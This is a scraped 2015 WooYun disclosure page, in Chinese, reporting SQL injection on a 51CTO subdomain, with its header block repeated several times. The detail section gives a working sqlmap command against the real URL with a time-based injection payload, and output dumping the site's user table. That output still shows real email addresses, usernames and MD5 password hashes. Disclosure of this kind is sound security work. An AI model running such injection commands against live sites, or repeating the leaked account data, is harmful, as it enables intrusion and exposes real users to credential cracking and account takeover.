51cto某站SQL注入2万用户信息泄露风险 | wooyun-2015-0115416| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115416

漏洞标题：51cto某站SQL注入2万用户信息泄露风险

漏洞作者： D＆G

提交时间：2015-05-22 11:24

修复时间：2015-07-06 14:40

公开时间：2015-07-06 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-22：细节已通知厂商并且等待厂商处理中
2015-05-22：厂商已经确认，细节仅向厂商公开
2015-06-01：细节向核心白帽子及相关领域专家公开
2015-06-11：细节向普通白帽子公开
2015-06-21：细节向实习白帽子公开
2015-07-06：细节向公众公开

简要描述：

sqli

详细说明：

id参数存在sql注入。poc：
➜ sqlmap git:(master) ✗ python sqlmap.py -u "http://os.51cto.com/shtml/comment/bargraphsgoog.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)" --random-agent --level 5 -D passport -T user
2w5用户

25722
Database: passport
+--------+---------+
| Table  | Entries |
+--------+---------+
| `user` | 25722   |
+--------+---------+

漏洞证明：

mask 区域

*****^^信^*****
**********
*****abase: p*****
*****: u*****
*****tri*****
*****-------+---------+------------------+---------+------------------*****
*****       | data    | about            | bcena   | email            *****
*****-------+---------+------------------+---------+------------------*****
1.://**.**.**//http://             | <blank> | ÎŢť°żÉËľ         | <blank> | kangt111onglei2@163.com | admin      | żŐ              | 1741277a62f84cdd28eab5640e69dbaf | blackdot |_
2.://**.**.**//www.rsschina.com.cn | <blank> | wo shi chinaren! | <blank> | chendeyong@hotmail.com  | chendeyong | haidianquşŁľíÇř | e10adc3949ba59abbe56e057f20f883e | cdy      |_
*****  | <blank> | cguo999@yahoo.com.*****
*****-+---------+------------------+---------+-------------------------+-*****
**********
*****abase: p*****
*****abl*****
*****-----*****
*****     *****
*****     *****
*****ersco*****
*****core *****
*****etag *****
*****     *****
*****lass *****
*****     *****
*****um   *****
*****ime  *****
*****te   *****
*****nt   *****
*****e    *****
*****euser*****
*****     *****
*****rnum *****
*****ss   *****
*****ail  *****
*****re1  *****
*****se   *****
*****tail *****
*****a    *****
*****orite*****
*****iew  *****
*****re   *****
*****ather*****
*****r    *****
*****--+</*****

修复方案：

SQL注入的防御方法：采用预编译

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：7

确认时间：2015-05-22 14:38

厂商回复：

这是一个多年前产品的老库，已经停用，多谢白帽子提醒。
已经修复，谢谢。

漏洞评价：

2015-05-22 13:24 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

这个牛逼
2015-05-22 13:27 | D＆G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

@PgHook 哥们又来逗我了。请吃饭啊
2015-05-22 13:34 | PgHook ( 普通白帽子 | Rank:964 漏洞数:115 | ...........................................)

@D＆G 你要请我吃饭啊？？
2015-05-22 15:55 | D＆G ( 普通白帽子 | Rank:523 漏洞数:103 | going)

可以啊。你来啊

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115416

漏洞标题：51cto某站SQL注入2万用户信息泄露风险

相关厂商：51CTO技术网站

漏洞作者： D＆G

提交时间：2015-05-22 11:24

修复时间：2015-07-06 14:40

公开时间：2015-07-06 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0115416

漏洞标题：51cto某站SQL注入2万用户信息泄露风险

相关厂商：51CTO技术网站

漏洞作者： D＆G

提交时间：2015-05-22 11:24

修复时间：2015-07-06 14:40

公开时间：2015-07-06 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0115416"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 D＆G@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：